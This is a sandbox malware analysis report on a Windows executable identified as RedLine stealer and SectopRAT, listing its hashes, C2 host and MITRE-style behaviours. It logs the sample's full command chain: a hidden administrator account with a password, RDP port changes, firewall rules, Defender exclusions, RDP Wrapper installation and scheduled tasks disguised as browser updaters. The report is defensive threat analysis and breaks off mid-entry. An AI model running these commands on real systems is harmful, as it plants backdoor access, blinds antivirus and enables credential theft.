Overview

overview

10

Static

static

3

04ce5d0bcd...dN.exe

windows7-x64

10

04ce5d0bcd...dN.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22-12-2024 04:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe

  • Size

    4.1MB

  • MD5

    3a63a094bced4de6d6d60818b7bbb260

  • SHA1

    924449f5414bc9e4964ba9fec4bb92326befad87

  • SHA256

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29d

  • SHA512

    1430317f400623744133efcf09311fd66913bfed8c33bfd4bb6e7336c89d8cedbd234f0f9ddb9ac6e1f4fc0e7a5598f9ed521d784267f0ea106e70d5373376fa

  • SSDEEP

    98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Score
10/10
redlinesectopratads6defense_evasiondiscoveryevasionexecutioninfostealerlateral_movementpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

redline

Botnet

ads6

C2

bhajhhsy6.fun:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 3 IoCs
  • Sectoprat family
    sectoprat
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

    lateral_movement
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 6 IoCs
    evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
    persistence
  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 21 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
    defense_evasion
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe
    "C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\SysWOW64\makecab.exe
      "C:\Windows\System32\makecab.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1964
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:584
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2516
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2848
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
          Potere.exe.com A
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2756
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              6⤵
              • Executes dropped EXE
              PID:1616
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2764
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
          Riscalda.exe.com Z
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2664
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2440
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2892
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
          Desideri.exe.com G
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              PID:784
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\1155.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\921.vbs
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1904
                • C:\Windows\SysWOW64\cscript.exe
                  cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\1155.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\921.vbs
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2544
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\54.vbs" tNIjJDBDAo ltouaSgNTI "C:\Users\Admin\AppData\Roaming\wkDUDQc\561.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                7⤵
                  PID:2148
                  • C:\Windows\SysWOW64\cscript.exe
                    cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\54.vbs" tNIjJDBDAo ltouaSgNTI "C:\Users\Admin\AppData\Roaming\wkDUDQc\561.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:952
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "Обновление Браузера Яндекс51"
                  7⤵
                    PID:1544
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "Обновление Браузера Яндекс51"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1520
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\316.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\921.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2224
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\316.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\921.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                      8⤵
                        PID:1380
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "GoogleUpdateTaskMachineCore6"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:1668
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "GoogleUpdateTaskMachineCore6"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1684
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wkDUDQc\xFtusaUtcN.bat tNIjJDBDAo ltouaSgNTI"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:896
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:1548
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          wmic group where sid="S-1-5-32-544" get name /value
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1716
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:1712
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          wmic group where sid="S-1-5-32-555" get name /value
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3020
                      • C:\Windows\SysWOW64\net.exe
                        net user tNIjJDBDAo ltouaSgNTI /add
                        8⤵
                          PID:568
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 user tNIjJDBDAo ltouaSgNTI /add
                            9⤵
                              PID:2612
                          • C:\Windows\SysWOW64\net.exe
                            net localgroup Administrators tNIjJDBDAo /add
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2240
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 localgroup Administrators tNIjJDBDAo /add
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1940
                          • C:\Windows\SysWOW64\net.exe
                            net localgroup "Remote Desktop Users" tNIjJDBDAo /add
                            8⤵
                            • Remote Service Session Hijacking: RDP Hijacking
                            • System Location Discovery: System Language Discovery
                            PID:792
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 localgroup "Remote Desktop Users" tNIjJDBDAo /add
                              9⤵
                              • Remote Service Session Hijacking: RDP Hijacking
                              • System Location Discovery: System Language Discovery
                              PID:756
                          • C:\Windows\SysWOW64\net.exe
                            net accounts /maxpwage:unlimited
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2720
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 accounts /maxpwage:unlimited
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:2920
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v tNIjJDBDAo /t REG_DWORD /d "00000000" /f
                            8⤵
                            • Hide Artifacts: Hidden Users
                            • System Location Discovery: System Language Discovery
                            PID:2564
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2464
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                            8⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2332
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2328
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1440
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2852
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2928
                          • C:\Windows\SysWOW64\timeout.exe
                            Timeout /t 15
                            8⤵
                            • System Location Discovery: System Language Discovery
                            • Delays execution with timeout.exe
                            PID:3040
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
                          7⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:1668
                          • C:\Windows\SysWOW64\fsutil.exe
                            fsutil dirty query C:
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2152
                          • C:\Windows\SysWOW64\sc.exe
                            sc queryex "TermService"
                            8⤵
                            • Launches sc.exe
                            PID:944
                          • C:\Windows\SysWOW64\find.exe
                            find "STATE"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1956
                          • C:\Windows\SysWOW64\find.exe
                            find /v "RUNNING"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1656
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1728
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            PID:572
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:2204
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2964
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2728
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c query session rdp-tcp
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2824
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2960
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall delete rule name="Remote Desktop"
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:2136
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            PID:2276
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:2772
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2164
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:372
                          • C:\Windows\SysWOW64\reg.exe
                            reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2748
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2588
                            • C:\Windows\SysWOW64\cscript.exe
                              cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1276
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1752
                            • C:\Windows\SysWOW64\reg.exe
                              reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:2828
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2740
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1512
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\148.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\725.vbs" "VXpBeFVsQllVazlUVjNCTFVrVktSVkZYT0cxaU0zQlRZV294YzJSSE9URlpWazV1Vkd4U1NrcHNRblZWVlhoMldqQkpPV1Y2ClRYaFBSRlY1VG10WmQweFZSVE5PYWsxMENrNUVaM2hSYVRGRFVWVlNSMHhVYTNoTmEwWkZVa1JaZDA1VVkzbFNiakE5" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:1540
                          • C:\Windows\SysWOW64\cscript.exe
                            cscript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\148.vbs" "C:\Users\Admin\AppData\Roaming\wkDUDQc\725.vbs" "VXpBeFVsQllVazlUVjNCTFVrVktSVkZYT0cxaU0zQlRZV294YzJSSE9URlpWazV1Vkd4U1NrcHNRblZWVlhoMldqQkpPV1Y2ClRYaFBSRlY1VG10WmQweFZSVE5PYWsxMENrNUVaM2hSYVRGRFVWVlNSMHhVYTNoTmEwWkZVa1JaZDA1VVkzbFNiakE5" "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1000
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "MySQLNotifierTask93"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:2956
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll" /tn "MySQLNotifierTask93"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:2612
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 30
                    4⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:2660
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {805B2824-9CFA-4912-8F04-103429252F6E} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]
              1⤵
                PID:1872
                • C:\Windows\System32\WScript.exe
                  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\561.vbs" tNIjJDBDAo ltouaSgNTI "C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat"
                  2⤵
                    PID:2384
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat
                      3⤵
                      • Drops file in System32 directory
                      PID:1624
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                        4⤵
                          PID:2948
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic group where sid="S-1-5-32-544" get name /value
                            5⤵
                              PID:340
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                            4⤵
                              PID:1992
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic group where sid="S-1-5-32-555" get name /value
                                5⤵
                                  PID:1980
                              • C:\Windows\system32\net.exe
                                net user tNIjJDBDAo ltouaSgNTI /add
                                4⤵
                                  PID:540
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user tNIjJDBDAo ltouaSgNTI /add
                                    5⤵
                                      PID:2260
                                  • C:\Windows\system32\net.exe
                                    net localgroup Administrators tNIjJDBDAo /add
                                    4⤵
                                      PID:2628
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 localgroup Administrators tNIjJDBDAo /add
                                        5⤵
                                          PID:2936
                                      • C:\Windows\system32\net.exe
                                        net localgroup Remote Desktop Users tNIjJDBDAo /add
                                        4⤵
                                          PID:864
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 localgroup Remote Desktop Users tNIjJDBDAo /add
                                            5⤵
                                              PID:1092
                                          • C:\Windows\system32\net.exe
                                            net accounts /maxpwage:unlimited
                                            4⤵
                                              PID:1988
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                5⤵
                                                  PID:804
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v tNIjJDBDAo /t REG_DWORD /d "00000000" /f
                                                4⤵
                                                • Hide Artifacts: Hidden Users
                                                PID:2136
                                              • C:\Windows\system32\reg.exe
                                                reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                                4⤵
                                                  PID:2300
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  PID:2132
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
